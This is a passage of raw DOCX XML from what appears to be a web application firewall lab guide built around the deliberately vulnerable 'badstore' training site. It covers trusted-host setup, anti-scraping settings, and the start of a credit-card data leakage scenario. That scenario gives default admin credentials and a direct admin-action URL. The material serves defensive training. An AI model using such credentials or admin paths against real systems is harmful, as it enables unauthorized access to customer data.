        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="3A943E86">
        <w:drawing>
          <wp:inline wp14:editId="765634BC" wp14:anchorId="1C6F963A">
            <wp:extent cx="5715000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680396535" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3ef36ad9cde74f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15000" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="5699A015" w14:textId="6F0A25BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Enable Trusted Hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07D0A2DB" w14:textId="2C9DE11D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Add Host. Enter the IP 38.227.79.50 and mask 255.255.255.255.  Enter “</w:t>
      </w:r>
      <w:r w:rsidR="077A7D66">
        <w:rPr/>
        <w:t>Trusted Scanner</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">” for the </w:t>
      </w:r>
      <w:r w:rsidR="39837D8E">
        <w:rPr/>
        <w:t>name and</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="529D3A5A" w14:textId="277F5DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="699639B3" w:rsidRDefault="699639B3" w14:paraId="424F7AE2" w14:textId="2BB6700B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="1FC964CF" w14:textId="5D17F447">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="51B1179B" w:rsidP="5BDB08D7" w:rsidRDefault="51B1179B" w14:paraId="58630C48" w14:textId="5C739DFB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="51B1179B">
        <w:rPr/>
        <w:t>Customer Requested Configuration - Web Scraping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="5B98B6A0" w14:textId="25CC2361">
      <w:r>
        <w:t>“My competitor, TerribleStore, started selling the same things and whenever I change my prices, their prices are almost immediately 1 cent cheaper than mine!  How do they do that?  How do I stop them?”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="77B58D62" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="6F3F4996" w14:textId="01849DD5">
      <w:r w:rsidR="01863C00">
        <w:rPr/>
        <w:t>Consider what</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> type of software would t</w:t>
      </w:r>
      <w:r w:rsidR="302736D3">
        <w:rPr/>
        <w:t xml:space="preserve">hey </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">use to </w:t>
      </w:r>
      <w:r w:rsidR="3C0F2C61">
        <w:rPr/>
        <w:t xml:space="preserve">automatically </w:t>
      </w:r>
      <w:r w:rsidR="5AF352D9">
        <w:rPr/>
        <w:t xml:space="preserve">crawl the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5AF352D9">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5AF352D9">
        <w:rPr/>
        <w:t xml:space="preserve"> site and grab </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="7A0FD9CC">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> products and prices</w:t>
      </w:r>
      <w:r w:rsidR="69491A3D">
        <w:rPr/>
        <w:t xml:space="preserve"> listed</w:t>
      </w:r>
      <w:r w:rsidR="28421E7F">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28421E7F" w:rsidP="5BDB08D7" w:rsidRDefault="28421E7F" w14:paraId="5BE8FEA0" w14:textId="1461E05F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="28421E7F">
        <w:rPr/>
        <w:t>Spoiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="16AED19E" w:rsidRDefault="00DE1F9B" w14:paraId="5E2897FD" w14:textId="24C700BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>The competitor is using a Web Scraper to scrape our customer’s price list</w:t>
      </w:r>
      <w:r w:rsidR="4B261D74">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="16AED19E" w:rsidRDefault="00DE1F9B" w14:paraId="2DBAB528" w14:textId="270CDFDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Add the</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00DE1F9B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distributed Denial-of-Service</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> component.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="5BDB08D7" w:rsidRDefault="00DE1F9B" w14:paraId="71ADAABA" w14:textId="31DFA9AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">Choose the </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00DE1F9B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Web Scraping</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> sub-</w:t>
      </w:r>
      <w:r w:rsidR="7DE87A16">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F511596" w:rsidP="5BDB08D7" w:rsidRDefault="5F511596" w14:paraId="0CBD2C5E" w14:textId="1E678FF3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5F511596">
        <w:rPr/>
        <w:t>Turn on “Insert hidden links in response”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F511596" w:rsidP="5BDB08D7" w:rsidRDefault="5F511596" w14:paraId="1AE10341" w14:textId="4FE741C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5F511596">
        <w:rPr/>
        <w:t>Turn on “Insert disallowed URLs in robots.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F511596" w:rsidP="5BDB08D7" w:rsidRDefault="5F511596" w14:paraId="6B1FABF3" w14:textId="6313C07C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5F511596">
        <w:rPr/>
        <w:t>Turn on “Insert JavaScript in response”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="556C21B9" w:rsidP="5BDB08D7" w:rsidRDefault="556C21B9" w14:paraId="05AE8841" w14:textId="69AF44CC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="556C21B9">
        <w:drawing>
          <wp:inline wp14:editId="0FBF4F4E" wp14:anchorId="5121A836">
            <wp:extent cx="3533775" cy="2089684"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1852016664" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2c9cff686d3d456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33775" cy="2089684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="5BDB08D7" w:rsidRDefault="00DE1F9B" w14:paraId="7299F542" w14:textId="36BFAFD2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">Choose the </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00DE1F9B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Client Evaluation</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> sub</w:t>
      </w:r>
      <w:r w:rsidR="0058093A">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="3EE3BFAD">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DE1F9B" w:rsidR="00DE1F9B" w:rsidP="5BDB08D7" w:rsidRDefault="0F97E62A" w14:paraId="4C1635EA" w14:textId="699DCB6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="196F390B">
        <w:rPr/>
        <w:t xml:space="preserve">Turn on </w:t>
      </w:r>
      <w:r w:rsidR="0F97E62A">
        <w:rPr/>
        <w:t>Client Evaluation</w:t>
      </w:r>
      <w:r w:rsidR="2F7932BE">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DE1F9B" w:rsidR="00DE1F9B" w:rsidP="5BDB08D7" w:rsidRDefault="0F97E62A" w14:paraId="7A6411B8" w14:textId="135C5FBA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="207E34A3">
        <w:drawing>
          <wp:inline wp14:editId="320C45AC" wp14:anchorId="3CEDA2A1">
            <wp:extent cx="2847976" cy="736955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1024916528" name="Picture 1024916528" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1024916528"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R79eb8521204b4d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47976" cy="736955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0F97E62A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F981A1E" w:rsidP="5BDB08D7" w:rsidRDefault="7F981A1E" w14:paraId="72BBCE80" w14:textId="4A61FDCB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve">Click Save.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F981A1E" w:rsidP="5BDB08D7" w:rsidRDefault="7F981A1E" w14:paraId="5177A90B" w14:textId="351591D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>Notice “The Spinner” at the top of the screen … wait for your changes to propagate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F981A1E" w:rsidP="5BDB08D7" w:rsidRDefault="7F981A1E" w14:paraId="6F78F05E" w14:textId="5CFBC3D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>Click on “The Spinner” to se</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="7F981A1E">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32965056" w:rsidRDefault="32965056" w14:paraId="28DDD2C6" w14:textId="0D4AC515">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="16AED19E" w:rsidRDefault="009307BA" w14:paraId="229E2784" w14:textId="3967926E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="5CD28195">
        <w:rPr/>
        <w:t>Customer Request</w:t>
      </w:r>
      <w:r w:rsidR="5674529E">
        <w:rPr/>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="5CD28195">
        <w:rPr/>
        <w:t xml:space="preserve"> Configuration: </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">Credit Card </w:t>
      </w:r>
      <w:r w:rsidR="6331BEE9">
        <w:rPr/>
        <w:t xml:space="preserve">P.I.I. </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>Leakage</w:t>
      </w:r>
      <w:r w:rsidR="5009B39E">
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="16AED19E" w:rsidRDefault="009307BA" w14:paraId="5CBB8981" w14:textId="2AD6B2C0">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>was showing off my reporting system to our auditor last week</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>logged into the site’s admin interface by going to the “</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Login/Register</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” page, entering “</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” in the username box and “</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="009307BA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>” in the password</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> box</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Then I went to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Super Secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> Administration Menu by navigating to </w:t>
      </w:r>
      <w:hyperlink r:id="R8de21f1b86c3472e">
        <w:r w:rsidRPr="16AED19E" w:rsidR="4EC64C1E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://badstore.cudathon.com</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cgi</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-bin/</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>badstore.cgi?action</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
        <w:r w:rsidRPr="16AED19E" w:rsidR="00D140A2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="16AED19E" w:rsidRDefault="009307BA" w14:paraId="4D09DF50" w14:textId="488ABA77">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">I chose “View Sales Reports” and clicked </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">“Do It.” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="16AED19E" w:rsidRDefault="009307BA" w14:paraId="7FFABB8B" w14:textId="7CEBDF37">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>I glanced at the auditor and her eyes were wide</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">!  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
